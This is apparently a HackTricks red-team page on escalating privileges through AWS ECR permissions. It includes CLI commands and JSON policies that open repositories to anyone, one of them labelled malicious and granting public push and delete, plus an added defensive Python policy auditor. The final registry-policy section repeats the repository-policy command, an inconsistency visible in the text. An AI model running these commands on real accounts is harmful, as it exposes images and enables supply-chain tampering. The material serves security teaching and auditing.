Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF Check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
An attacker with the ecr:GetAuthorizationToken and ecr:BatchGetImage permissions can log in to ECR and download images.
For more info on how to download images:
{% content-ref url="../aws-post-exploitation/aws-ecr-post-exploitation.md" %} aws-ecr-post-exploitation.md {% endcontent-ref %}
Potential Impact: Indirect privesc by intercepting sensitive information in the traffic.
ecr:GetAuthorizationToken, ecr:BatchCheckLayerAvailability, ecr:CompleteLayerUpload, ecr:InitiateLayerUpload, ecr:PutImage, ecr:UploadLayerPart
An attacker with all of those permissions can log in to ECR and upload images. This can be useful to escalate privileges to other environments where those images are being used.
To learn how to upload a new image/update one, check:
{% content-ref url="../aws-services/aws-eks-enum.md" %} aws-eks-enum.md {% endcontent-ref %}
ecr-public:GetAuthorizationToken, ecr-public:BatchCheckLayerAvailability, ecr-public:CompleteLayerUpload, ecr-public:InitiateLayerUpload, ecr-public:PutImage, ecr-public:UploadLayerPart
Like the previous section, but for public repositories.
An attacker with this permission could change the repository policy to grant himself (or even everyone) read/write access.
In this example, read access is given to everyone.

```bash
aws ecr set-repository-policy \
    --repository-name <repo_name> \
    --policy-text file://my-policy.json
```

Contents of my-policy.json:

```json
{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "allow public pull",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr:BatchCheckLayerAvailability",
        "ecr:BatchGetImage",
        "ecr:GetDownloadUrlForLayer"
      ]
    }
  ]
}
```
Like the previous section, but for public repositories.
An attacker can modify the repository policy of an ECR Public repository to grant unauthorized public access or to escalate their privileges.
{% code overflow="wrap" %}
```bash
# Create a JSON file with the malicious public repository policy
echo '{
  "Version": "2008-10-17",
  "Statement": [
    {
      "Sid": "MaliciousPublicRepoPolicy",
      "Effect": "Allow",
      "Principal": "*",
      "Action": [
        "ecr-public:GetDownloadUrlForLayer",
        "ecr-public:BatchGetImage",
        "ecr-public:BatchCheckLayerAvailability",
        "ecr-public:PutImage",
        "ecr-public:InitiateLayerUpload",
        "ecr-public:UploadLayerPart",
        "ecr-public:CompleteLayerUpload",
        "ecr-public:DeleteRepositoryPolicy"
      ]
    }
  ]
}' > malicious_public_repo_policy.json

# Apply the malicious public repository policy to the ECR Public repository
aws ecr-public set-repository-policy --repository-name your-ecr-public-repo-name --policy-text file://malicious_public_repo_policy.json
```
{% endcode %}
Potential Impact: Unauthorized public access to the ECR Public repository, allowing any user to push, pull, or delete images.
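On the defensive side, both repository policies shown above can be caught by auditing policy text (for example the `policyText` returned by `aws ecr get-repository-policy`) for Allow statements with a wildcard principal. The following is an added example, not part of the original page; the function names and severity buckets are this example's own assumptions, the write policy is abbreviated from the one above, and the scoped policy is constructed.

```python
import json

# Severity buckets are this example's own grouping, not an AWS-defined list.
WRITE = {"PutImage", "InitiateLayerUpload", "UploadLayerPart", "CompleteLayerUpload"}
ADMIN = {"SetRepositoryPolicy", "DeleteRepositoryPolicy"}

def _as_list(value):
    return value if isinstance(value, list) else [value]

def _open_to_anyone(principal):
    # Matches "Principal": "*" as well as maps such as {"AWS": "*"}.
    if isinstance(principal, dict):
        return any("*" in _as_list(v) for v in principal.values())
    return principal == "*"

def audit_policy(policy_text):
    """Return one finding per Allow statement whose principal is a wildcard."""
    findings = []
    for stmt in _as_list(json.loads(policy_text).get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _open_to_anyone(stmt.get("Principal")):
            continue
        names = {a.split(":", 1)[-1] for a in _as_list(stmt.get("Action", []))}
        if stmt.get("Condition"):
            severity = "review"    # a condition may narrow the wildcard; check by hand
        elif names & ADMIN or any("*" in n for n in names):
            severity = "critical"  # policy management or wildcard actions for anyone
        elif names & WRITE:
            severity = "high"      # anyone can push images
        else:
            severity = "medium"    # anyone can pull images
        findings.append({"sid": stmt.get("Sid"), "severity": severity,
                         "actions": sorted(names)})
    return findings

def _policy(sid, principal, actions):
    # Helper that builds a single-statement policy document for the samples below.
    return json.dumps({"Version": "2008-10-17", "Statement": [
        {"Sid": sid, "Effect": "Allow", "Principal": principal, "Action": actions}]})

PUBLIC_PULL = _policy("allow public pull", "*", ["ecr:BatchCheckLayerAvailability",
    "ecr:BatchGetImage", "ecr:GetDownloadUrlForLayer"])   # from this page
PUBLIC_WRITE = _policy("MaliciousPublicRepoPolicy", "*", ["ecr-public:BatchGetImage",
    "ecr-public:PutImage", "ecr-public:DeleteRepositoryPolicy"])  # abbreviated
SCOPED = _policy("ScopedPull", {"AWS": "arn:aws:iam::111122223333:root"},
    ["ecr:BatchGetImage"])                                 # constructed sample

if __name__ == "__main__":
    for name, text in [("pull", PUBLIC_PULL), ("write", PUBLIC_WRITE), ("scoped", SCOPED)]:
        print(name, audit_policy(text))
```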
An attacker with this permission could change the registry policy to grant himself, his account (or even everyone) read/write access.
```bash
aws ecr set-repository-policy \
    --repository-name <repo_name> \
    --policy-text file://my-policy.json
```